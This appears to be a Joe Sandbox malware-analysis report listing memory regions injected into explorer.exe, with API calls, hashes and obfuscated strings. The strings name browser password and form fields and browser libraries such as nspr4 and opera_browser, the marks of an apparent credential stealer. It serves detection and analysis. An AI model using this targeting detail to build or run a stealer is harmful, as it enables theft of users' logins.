                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: a74008eecad9ef5c301e144f85feb411fc1ce5f338446d8b81a48fd443f23c08
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 320171706186188FC784DF1CD048B51BBE0FB59354F1545ADE40ECB226C7B4C9818B82

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: 5ed4099f32bb5b3f0ac9f3622c1a4b1e46909dccb650c303a93f5fbeb190ff96
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 7C316A78604B49DADB94DF2980882D5B7A4FB58304F44826ECD1DCA346DBB8A890CF91

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559239704.0000000010410000.00000040.80000000.00040000.00000000.sdmp, Offset: 10410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10410000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: aeb94a74c96780c8426590681e5b2a77d2d13f0e629b05cf0d47d19497a79246
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 40F02234228A080FD788EF2CD48167AB3D0EBEC204F40463EA68DC3220DE38D9824706
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 6366140b786167c64abf4fff402dfb41f0b7f5898c074f01eb4a5b81f8ce96ac
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: E1E16C74618F488FC7A8DF68C495BAAB7E0FB58300F504A2EA59FC7251DF30A545CB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 25c18e59557e350efaffd9bbcb2e6b2309bf086f10e3291a038fc586307ab2dd
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: ECE17974618F488FC7A5DF68C585BAAB7E0FB58300F514A2EA59FC7245DF30A501CB8A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: abcd2cfd66f11bcef9a0bcf72b97eff969a9d76f9d47dc3f55704eaa71a8c21f
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: 38E16878618B488FCBA4DF68C4947ABB7E0FB58300F504A2EA59FC7255DF30A541CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: ced0b84784fcef8f47cfe13e4e17719d6c31d89a52145b1e85d98769b721497b
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: A6B19D74518B488FDB55EF68C486AEEB7F1FF58300F50451EE49ACB261EF70A4098B86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: 6f34a410f163cf154f81d6d9b95b4330caa6a75dc451d2b66b926a94c8b01af7
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: 41B18A34518B488FDB55EF68C58AAEEB7F1FF98300F50451EE49AC7251EF70A4098B86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: ab096684c62b4fa6dee599cd0786e4e5e1695c46f6b37e6d42e0212ff82979dc
                                            • Instruction ID: 07d80b4c3703ff5a3c77fdea614f587c5a558f68e14634427cba2a0925905ddb
                                            • Opcode Fuzzy Hash: ab096684c62b4fa6dee599cd0786e4e5e1695c46f6b37e6d42e0212ff82979dc
                                            • Instruction Fuzzy Hash: 9CB1AD74518B488EDB14EF68C486AEEB7F1FF98300F50461EE49ACB251EF70A445CB86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 301e0e3f97ca4aa1d71a0af9acfdf7370db2c61fb7fb9b4965723354cfa78e12
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 6541AF70A18B08CFDF14DF88E4567AD7BE2EB48700F00025EE409D7295DBB5AD498BD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 17f859b5641ff4430ee13d7fc7d829a468f27cc9bb73f73aca6cbd295154f4d9
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 9C419070B18B088FDB14DF88A44A6AD7BEAFB48700F00025EE549D7246DBB5AD458BD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: d4c0600765e95d9644f3b004760b772fb69c17b8ab6c6f5d70f8b028c9cbfaab
                                            • Instruction ID: 03d87258343684450a9a052f59dfaed347d29a05ddbee74afc6f0cb1ba73fc2c
                                            • Opcode Fuzzy Hash: d4c0600765e95d9644f3b004760b772fb69c17b8ab6c6f5d70f8b028c9cbfaab
                                            • Instruction Fuzzy Hash: 0441B270A18B088FDF54DF88A4466BE7BE2FB88700F00425EE449D3249DB75AD49CBD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 8047931011de98f4c07fdc8dfcf8ed7fcc3fa7ad4b16153ce660abe3032cf3eb
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 22C15B75218B098FC758EF64C496AAAF3E5FB94304F40472EA49AC7260DF70B519CB86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: d831fbc6af823746a9c07607847c9add9e2b04da3db12d9ab2d545e9b37bb556
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 8EC15B74218B089BC758EF64C586BEAF3E5FB98304F41462EA49AC7210DF70F655CB86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 484dc7622b0d5404bc289f85038c7f9c75b4ab2ddfe7a41c65d5b5c6d7a218b5
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 55C16C79218B098FC758EF24C49669AF3E1FB98304F40472EA4AEC7251DF70B556CB86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 768ec4c277a52466dbaa485c0a9d08c8afa1dc5f5db6a0cfad267d580d82264c
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: A651E5305187488FD759DF18D8856AAB7E5FBC4304F501A2EE8CBC7251DBB4A94ACB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 9b964c45366ef9b8042b9da591c2b7c8c82bcf4fcbf672b188fb386740b7bf11
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 4F51C53451C7488FD709CF18D5817AAB7E5FB85700F515A2EE8CBC7242DBB4A906CB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: d42ef21594bc3b1b04b3184bcbd180db13b3950f8e16b942ea39434d8b26837d
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: FFC17474618E194FC758EF68D456EAAF3E1FB98300F51432DA44ACB265DF30EA0AC785
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: cd48cd001c6cd8a9a3e0cf484737ed29783558d142fc807ca79566d01dc314ad
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 6AC16474618A194FC758EF68D456EAAF3E1FB98300F51432DA44ACB265DF30E90AC785
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: 99fe52448e57a0c15ad1a4895cd7c239d846ed51f86d894bfe93673366c0596a
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 98C19F74618E194FC758EF68D596BAAB3E5FB98300F454329A44AC7254DF30EA02CBC6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: cda095872a8fa2e1fa0f90b984e627efeee961de4b3dc32d82c89c16d08fe123
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: 34C1A074618E194FC758EF68D556BAAB3E5FF98300F854329A44AC7250DF30EA02CBC6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 9d30e79ed5fee0c1d5fd49b7b1f5c9184da7817a1b6f87e03f67288e3f9e3d16
                                            • Instruction ID: ed5590bd22e7b59bb21f8a2efd8294e64e7858f2acc3e93ca8ca1ada27168c86
                                            • Opcode Fuzzy Hash: 9d30e79ed5fee0c1d5fd49b7b1f5c9184da7817a1b6f87e03f67288e3f9e3d16
                                            • Instruction Fuzzy Hash: 81C1C279618A198FC748EF68D496AEAB3E1FB98300F504369A41EC7255DF30E941CFC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: bb2c8f803b3550fa1dddcd5262a05046dcfbf91c706a3f07daf5b8b443b65bd7
                                            • Instruction ID: 6a1f2bde1096666a4418ad36a7bd3297ebf0a7e6e8875b8ba32c42cb0fed23ea
                                            • Opcode Fuzzy Hash: bb2c8f803b3550fa1dddcd5262a05046dcfbf91c706a3f07daf5b8b443b65bd7
                                            • Instruction Fuzzy Hash: 24C1C279618A198FC748EF68D496AEAB3E1FB98300F504369A41EC7255DF30E941CFC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: a56a746aaba3296d8451832328e2f6f8edea93887f53785c789e235095dd0a2c
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 2CA18F706187488FDB19DFA8D445BEEB7E1FF98300F40462DE48AD7291EF7095498789
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 69e98dcaf632d5d63f57c6b57474136cd0e988d45a71c0e3fbcff44b42b531f9
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 14A1CE706187488FDB19DFA8D544BEEB7E1FF89310F00462DE48AD7251EF7099458789
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: faecd8f0e1efebfa4d9700d0100e626d159805ed599e904fb8c3887653424272
                                            • Instruction ID: 849f1ba8ef4df2586c40b7ebad166554d55010ab8921351b632a0488efe9b87b
                                            • Opcode Fuzzy Hash: faecd8f0e1efebfa4d9700d0100e626d159805ed599e904fb8c3887653424272
                                            • Instruction Fuzzy Hash: 9AA1DE746187488FDB19DFA8D4447EEB7E2FF98300F40462EE48AD7251EE309985CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 24a493e091eedebcc29f7fe46d806e6a712f154bd31aee9f21db9a7ccbbb0b69
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 9A918E706187488FDB19DFA8D445BEEB7E1FF98300F40462EE48AD7292EF7095498789
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: b6a0686a4a9916c2bd2db303e83bf4f9112d4b14e6f37b97ededc771ecfc4a20
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: 0891BE706187488FDB18DFA8D544BEEB7E1FF89310F00462EE48AD7241EF7095458789
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: fe1ea33f86d2579ffe451e93606c83392e0fcc259d4d5a21f07e7454e2bd6bba
                                            • Instruction ID: 84760b5e151e96bdfdee1de7b9200f3d08b4bec7a1bb400bbd77db9cd06acd38
                                            • Opcode Fuzzy Hash: fe1ea33f86d2579ffe451e93606c83392e0fcc259d4d5a21f07e7454e2bd6bba
                                            • Instruction Fuzzy Hash: 9491CE74618B488FDB18DFA8D444BEEB7E2FB98300F00462EE48AD7251EF709545CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: 60c94e2ad514ce537fe00f05b2d6383915be528c050927faaaf78e65caf1881f
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 9071B5316187498FD759EF68D489BAAB7F0FF58304F00062EE44AC7261EF70E9498B81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10a70000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: d7a8c7a0523ae7c0f00300ec7f6895e7dcab98ad9acc60cdf091df33ae059a73
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: 1D71A035618B4D8FD758DFA8C585BAAB7F0FF98304F01062EE44AC7221EB70E9458B81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559463181.0000000010BF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 10BF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10bf0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 7828529f2bff13954ce9421705057d3f39e259187ff153fcc95431a1d4029c81
                                            • Instruction ID: c6931eea0d7a592ecaf9c427425f09c7d9db727e7ddc861e38261b35c0f32c6a
                                            • Opcode Fuzzy Hash: 7828529f2bff13954ce9421705057d3f39e259187ff153fcc95431a1d4029c81
                                            • Instruction Fuzzy Hash: FE71A375618B488FD759DFA8C4856AAB7F1FF98304F00062EE44ACB221EF70E945CB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559158946.0000000010300000.00000040.80000000.00040000.00000000.sdmp, Offset: 10300000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_10300000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 4b4a7b8bf5e1783a95138e3ff3eaafa0d12edea78c092b50f44e1c873225b888
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: 17513DB0914B4C8FDB64EF64C045AEEB7F1FF58300F40462EA49AE7214EF70A5458B99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.4559372627.0000000010A70000.00000040.00000001.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
